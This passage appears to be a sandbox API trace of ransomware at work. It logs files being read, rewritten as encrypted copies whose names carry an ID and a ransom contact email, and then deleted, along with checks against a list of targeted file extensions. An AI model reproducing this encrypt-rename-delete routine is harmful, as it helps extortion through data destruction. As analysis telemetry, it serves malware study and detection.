lpNumberOfBytesRead=0x2bcfecc*=0x1397e, lpOverlapped=0x0) returned 1 [0047.787] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13980, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13980, lpOverlapped=0x0) returned 1 [0047.789] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.789] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.790] SetEndOfFile (hFile=0x2d0) returned 1 [0047.799] CloseHandle (hObject=0x2d0) returned 1 [0047.801] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.801] SetEndOfFile (hFile=0x2e0) returned 1 [0047.802] CloseHandle (hObject=0x2e0) returned 1 [0047.802] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.803] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 1 [0047.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.803] lstrlenW (lpString=".doc") returned 4 [0047.803] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.803] lstrlenW (lpString=".docx") returned 5 [0047.803] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.803] lstrlenW (lpString=".pdf") returned 4 [0047.803] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.803] lstrlenW (lpString=".xls") returned 4 [0047.803] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.803] lstrlenW (lpString=".xlsx") returned 5 [0047.803] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.803] lstrlenW (lpString=".ppt") returned 4 [0047.803] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.803] lstrlenW (lpString=".zip") returned 4 [0047.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.803] lstrlenW (lpString=".rar") returned 4 [0047.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.803] lstrlenW (lpString=".bz2") returned 4 [0047.804] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString=".7z") returned 3 [0047.804] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString=".dbf") returned 4 [0047.804] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString=".1cd") returned 4 [0047.804] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString=".jpg") returned 4 [0047.804] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString=".doc") returned 4 [0047.804] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString=".docx") returned 5 [0047.804] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.804] lstrlenW (lpString=".pdf") returned 4 [0047.804] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString=".xls") returned 4 [0047.804] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString=".xlsx") returned 5 [0047.804] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.804] lstrlenW (lpString=".ppt") returned 4 [0047.804] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.804] lstrlenW (lpString=".zip") returned 4 [0047.805] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.805] lstrlenW (lpString=".rar") returned 4 [0047.805] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.805] lstrlenW (lpString=".bz2") returned 4 [0047.805] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.805] lstrlenW (lpString=".7z") returned 3 [0047.805] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.805] lstrlenW (lpString=".dbf") returned 4 [0047.805] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.805] lstrlenW (lpString=".1cd") returned 4 [0047.805] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0047.805] lstrlenW (lpString=".jpg") returned 4 [0047.805] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.805] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.805] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.805] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.806] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=60816) returned 1 [0047.806] CloseHandle (hObject=0x2e0) returned 1 [0047.806] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 0x80 [0047.806] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.806] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.806] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.806] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.806] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.806] GetLastError () returned 0x0 [0047.806] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xed90, lpOverlapped=0x0) returned 1 [0047.974] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xeda0, lpOverlapped=0x0) returned 1 [0047.976] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.976] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.976] SetEndOfFile (hFile=0x2d0) returned 1 [0047.977] CloseHandle (hObject=0x2d0) returned 1 [0047.978] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.978] SetEndOfFile (hFile=0x2e0) returned 1 [0047.979] CloseHandle (hObject=0x2e0) returned 1 [0047.979] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.980] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 1 [0047.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.980] lstrlenW (lpString=".doc") returned 4 [0047.980] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.980] lstrlenW (lpString=".docx") returned 5 [0047.980] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.980] lstrlenW (lpString=".pdf") returned 4 [0047.980] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.980] lstrlenW (lpString=".xls") returned 4 [0047.980] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.980] lstrlenW (lpString=".xlsx") returned 5 [0047.980] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.980] lstrlenW (lpString=".ppt") returned 4 [0047.980] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.980] lstrlenW (lpString=".zip") returned 4 [0047.981] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.981] lstrlenW (lpString=".rar") returned 4 [0047.981] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString=".bz2") returned 4 [0047.981] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString=".7z") returned 3 [0047.981] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.981] lstrlenW (lpString=".dbf") returned 4 [0047.981] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.981] lstrlenW (lpString=".1cd") returned 4 [0047.981] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.981] lstrlenW (lpString=".jpg") returned 4 [0047.981] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.981] lstrlenW (lpString=".doc") returned 4 [0047.981] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString=".docx") returned 5 [0047.981] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.981] lstrlenW (lpString=".pdf") returned 4 [0047.981] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString=".xls") returned 4 [0047.981] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.981] lstrlenW (lpString=".xlsx") returned 5 [0047.981] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.982] lstrlenW (lpString=".ppt") returned 4 [0047.982] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.982] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.982] lstrlenW (lpString=".zip") returned 4 [0047.982] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.982] lstrlenW (lpString=".rar") returned 4 [0047.982] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.982] lstrlenW (lpString=".bz2") returned 4 [0047.982] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.982] lstrlenW (lpString=".7z") returned 3 [0047.982] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.982] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.982] lstrlenW (lpString=".dbf") returned 4 [0047.982] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.982] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.982] lstrlenW (lpString=".1cd") returned 4 [0047.982] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.982] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0047.982] lstrlenW (lpString=".jpg") returned 4 [0047.982] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.982] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.982] lstrlenW (lpString="UiInfo.xml") returned 10 [0047.982] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.989] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=39042) returned 1 [0047.989] CloseHandle (hObject=0x2cc) returned 1 [0047.989] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 0x80 [0047.989] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.989] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.989] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.989] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.989] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.992] GetLastError () returned 0x0 [0047.992] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x9882, lpOverlapped=0x0) returned 1 [0048.105] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9890, lpOverlapped=0x0) returned 1 [0048.107] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0048.107] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe8, lpOverlapped=0x0) returned 1 [0048.107] SetEndOfFile (hFile=0x2d0) returned 1 [0048.107] CloseHandle (hObject=0x2d0) returned 1 [0048.108] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.108] SetEndOfFile (hFile=0x2cc) returned 1 [0048.109] CloseHandle (hObject=0x2cc) returned 1 [0048.109] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.110] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 1 [0048.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.110] lstrlenW (lpString=".doc") returned 4 [0048.110] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString=".docx") returned 5 [0048.110] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.110] lstrlenW (lpString=".pdf") returned 4 [0048.110] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString=".xls") returned 4 [0048.110] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString=".xlsx") returned 5 [0048.110] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.110] lstrlenW (lpString=".ppt") returned 4 [0048.110] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.110] lstrlenW (lpString=".zip") returned 4 [0048.110] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.110] lstrlenW (lpString=".rar") returned 4 [0048.110] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString=".bz2") returned 4 [0048.110] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.110] lstrlenW (lpString=".7z") returned 3 [0048.110] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".dbf") returned 4 [0048.111] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".1cd") returned 4 [0048.111] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".jpg") returned 4 [0048.111] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".doc") returned 4 [0048.111] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString=".docx") returned 5 [0048.111] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.111] lstrlenW (lpString=".pdf") returned 4 [0048.111] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString=".xls") returned 4 [0048.111] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString=".xlsx") returned 5 [0048.111] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.111] lstrlenW (lpString=".ppt") returned 4 [0048.111] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".zip") returned 4 [0048.111] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.111] lstrlenW (lpString=".rar") returned 4 [0048.111] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString=".bz2") returned 4 [0048.111] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString=".7z") returned 3 [0048.111] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".dbf") returned 4 [0048.111] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.111] lstrlenW (lpString=".1cd") returned 4 [0048.111] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0048.112] lstrlenW (lpString=".jpg") returned 4 [0048.112] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.112] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0048.112] lstrlenW (lpString="ParameterInfo.xml") returned 17 [0048.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.129] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=272046) returned 1 [0048.129] CloseHandle (hObject=0x300) returned 1 [0048.129] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 0x80 [0048.129] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.129] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.129] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.129] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.129] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0048.129] GetLastError () returned 0x0 [0048.129] ReadFile (in: hFile=0x300, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x426ae, lpOverlapped=0x0) returned 1 [0048.248] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x426b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x426b0, lpOverlapped=0x0) returned 1 [0048.252] ReadFile (in: hFile=0x300, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0048.252] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0048.252] SetEndOfFile (hFile=0x2e4) returned 1 [0048.253] CloseHandle (hObject=0x2e4) returned 1 [0048.257] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.257] SetEndOfFile (hFile=0x300) returned 1 [0048.261] CloseHandle (hObject=0x300) returned 1 [0048.261] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.261] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 1 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString=".doc") returned 4 [0048.262] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString=".docx") returned 5 [0048.262] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.262] lstrlenW (lpString=".pdf") returned 4 [0048.262] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString=".xls") returned 4 [0048.262] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString=".xlsx") returned 5 [0048.262] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.262] lstrlenW (lpString=".ppt") returned 4 [0048.262] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.262] lstrlenW 